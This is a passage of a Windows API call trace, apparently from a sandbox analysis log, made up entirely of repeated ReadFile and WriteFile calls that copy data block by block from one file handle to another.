lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.014] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.015] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.015] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.016] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.016] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x315, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.017] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.017] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.018] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.018] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.019] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.019] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.020] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.020] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.021] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.021] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x301, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.021] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.022] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.022] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.023] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.023] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.024] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x341, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.024] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.025] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.025] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.026] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x303, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.026] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.027] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x315, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.027] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.028] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.028] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.029] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.029] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.030] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.030] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.031] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.031] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.032] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.032] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.033] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.033] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.034] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.034] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.035] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.035] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.036] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.036] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.037] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.037] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.038] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x323, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.038] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.039] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x378, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.039] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.040] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.040] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.041] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x357, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.041] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.041] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x312, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.042] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.042] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x384, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.043] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.044] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.044] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.045] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.045] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.045] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.046] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.046] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.047] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.047] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.048] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.048] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.049] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x306, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.049] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.050] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.050] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.050] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.051] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.051] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.052] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.052] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.053] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x252, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.053] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.054] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.054] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.055] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.055] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.056] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.056] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.057] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.057] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.058] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.058] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.059] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.059] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.059] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.060] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.060] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.061] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.061] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.062] 